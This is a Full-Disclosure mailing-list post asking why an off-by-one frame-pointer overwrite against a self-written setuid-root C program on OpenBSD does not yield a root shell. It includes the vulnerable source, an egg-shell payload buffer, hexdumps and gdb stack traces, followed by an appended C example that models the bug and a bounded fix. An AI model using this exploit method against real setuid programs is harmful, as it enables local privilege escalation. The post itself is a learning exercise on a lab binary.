
[Full-Disclosure] exploiting off by one



hi fd,

i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm
trying to exploit an off-by-one overflow and have some questions. first see
what i did:
  
vulnerable program: 
 
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <string.h>                 /* for strlen() */
#define BUFSIZE 128

int main(int argc, char **argv) {
        char buffer[BUFSIZE];
        int i, bufsiz;
        uid_t userid;
        bufsiz = BUFSIZE;
        if (argc < 2) return 1;     /* argv[1] is read below */
        userid = geteuid();
        setuid(userid);
        printf("userid: %i \n", (int)userid);
        printf("buffsize: %i \n", (int)sizeof(buffer));
        printf("buffsize: %i \n", bufsiz);
        for(i=0;i<=sizeof(buffer);i++) {   /* off by one: <= lets i reach 128 */
                buffer[i] = argv[1][i];    /* buffer[128] is one byte past the end */
        }
        printf("buffsize: %i \n", (int)strlen(buffer)); /* buffer is never NUL-terminated */
        printf("buffer: %s\n", buffer);

        return 0;
}
 
 
$ ls -l 
-rwsr-xr-x   1 root  wheel     7788 Apr 14 23:43 offbyone 
 
STARTING EGGSHELL: 
 
$ ./eggframeshell 134 68 1100 
        $EGG at:        0xcfbfd634 
        last_byte: 44 
OVERFLOW BUFFER: 
$ echo -n $IJV | hexdump -v 
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444 
0000080 4444 cfbf 
0000084 
 
$ gdb ./offbyone 
GNU gdb 4.16.1 
Copyright 1996 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i386-unknown-openbsd3.5"... 
(gdb) break 21 
warning: gdb ignores `const' qualifiers. 
Breakpoint 1 at 0x667: file offbyone.c, line 21. 
(gdb) run $IJV 
Starting program: /./offbyone $IJV 
userid: 1000 
buffsize: 128 
buffsize: 128 
 
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21 
21              printf("buffsize: %i \n", strlen(buffer)); 
(gdb) info frame 
Stack level 0, frame at 0xcfbfd1c0: 
 eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1 
 called by frame at 0xcfbfd144 
 source language c. 
 Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220 
 Locals at 0xcfbfd1c0, Previous frame's sp is 0x0 
 Saved registers: 
  ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4
(gdb) x/100x $esp 
0xcfbfd118:     0xcfbfd368      0xcfbfd220      0x00000001      0x00000000 
0xcfbfd128:     0x00000000      0xcfbfd17c      0x48f31671      0x000003e8 
0xcfbfd138:     0x00000080      0x00000081      0xcfbfd634      0xcfbfd634 
0xcfbfd148:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd158:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd168:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd178:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd188:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd198:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1a8:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1b8:     0x4444d634      0x44444444      0xcfbfd144      0x000004b1 
0xcfbfd1c8:     0x00000002      0xcfbfd220      0xcfbfd22c      0xcfbfd368 
0xcfbfd1d8:     0xcfbfd1fc      0x00000385      0x0000049f      0x00000000 
0xcfbfd1e8:     0xcfbfd21c      0x00001000      0x48f2e000      0x00000000 
0xcfbfd1f8:     0x00000410      0xcfbfd21c      0x00000427      0x00000002 
0xcfbfd208:     0xcfbfd220      0xcfbfd22c      0x00000000      0xcfbfdff0 
0xcfbfd218:     0x00000000      0x00000002      0xcfbfd368      0xcfbfd374 
0xcfbfd228:     0x00000000      0xcfbfd3f9      0xcfbfd424      0xcfbfd495 
0xcfbfd238:     0xcfbfd4a3      0xcfbfd4b1      0xcfbfd4c9      0xcfbfd4dd 
0xcfbfd248:     0xcfbfd4f4      0xcfbfd519      0xcfbfd536      0xcfbfd5bf 
0xcfbfd258:     0xcfbfd5ca      0xcfbfd5dd      0xcfbfdddd      0x00000000 
0xcfbfd268:     0x00000003      0x00000034      0x00000004      0x00000020 
0xcfbfd278:     0x00000005      0x00000006      0x00000006      0x00001000 
0xcfbfd288:     0x00000007      0x48f2e000      0x00000008      0x00000000 
0xcfbfd298:     0x00000009      0x00000410      0x00000000      0x00000000 
(gdb) 
(gdb) x/x  0xcfbfd634 
0xcfbfd634:     0x90909090 
 
$ ./offbyone $IJV 
userid: 0 
buffsize: 128 
buffsize: 128 
buffsize: 134 
buffer:

4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4ÖDDDDDDDѿϱ

$ 
 
hope it's enough information. my question is just this: i manipulated the least
significant byte of the frame pointer so that it points into my
buffer. there in my buffer is the address of my shellcode as the manipulated
return address. but the program is not segfaulting, if
the pointer points to $somewhere. it always exits normally, without opening
a root shell for me.
 
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti-overflow
protection disabled; a "normal" overflow works well).
 
hope anybody can enlighten me.  
 
joe 
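Added example, not part of joe's post: a small C model of the frame above that shows why the `<=` bound writes one byte past the 128-byte buffer (the low byte of the saved frame pointer in the stack dump, which reads 0xcfbfd144 after the 'D' at input offset 128), next to a bounded copy that keeps the guard byte intact and reports truncation so the caller can reject over-long input. The struct, the 0xAA sentinel and the 'A'/'D' input pattern are constructed for this example.

```c
#include <stddef.h>
#include <string.h>

#define BUFSIZE  128
#define SENTINEL 0xAA
#define MAXIN    512

/* Model of the vulnerable frame, constructed for this example: the 128-byte
 * buffer plus the one byte an off-by-one write reaches (the low byte of the
 * saved frame pointer in the post's stack dump). */
struct frame_model { unsigned char region[BUFSIZE + 1]; };

/* Hardened copy: strict '<' bound, room kept for the terminator, and a
 * return value telling the caller the input was truncated so it can reject it. */
int copy_bounded(char *dst, size_t dstsize, const char *src, size_t srclen) {
    size_t n = (srclen < dstsize - 1) ? srclen : dstsize - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen > n;
}

/* Runs either the posted loop shape (i <= BUFSIZE, one write too many; the
 * read side is bounded here only so the model itself has no UB) or the
 * hardened copy, on a constructed input of input_len bytes: 'A' for the
 * first 128 bytes and 'D' after that, so byte 128 is 0x44 as in the post.
 * Returns the byte that landed past the buffer, -1 if the guard is intact and
 * the input fit, -2 if the guard is intact but the input was truncated. */
int run_copy(size_t input_len, int hardened) {
    struct frame_model f;
    char in[MAXIN];
    size_t i;
    int truncated = 0;
    if (input_len > sizeof in) return -3;
    for (i = 0; i < input_len; i++) in[i] = (i < BUFSIZE) ? 'A' : 'D';
    memset(f.region, SENTINEL, sizeof f.region);    /* guard the extra byte */
    if (hardened) {
        truncated = copy_bounded((char *)f.region, BUFSIZE, in, input_len);
    } else {
        for (i = 0; i <= BUFSIZE && i < input_len; i++)   /* <= is the bug */
            f.region[i] = (unsigned char)in[i];
    }
    if (f.region[BUFSIZE] != SENTINEL) return f.region[BUFSIZE];
    return truncated ? -2 : -1;
}
```

With the 134-byte input the unhardened loop leaves 0x44 ('D') in the guard byte, matching the 0x44 low byte of the saved ebp in the dump; the bounded copy never touches it and instead flags the truncation.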


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html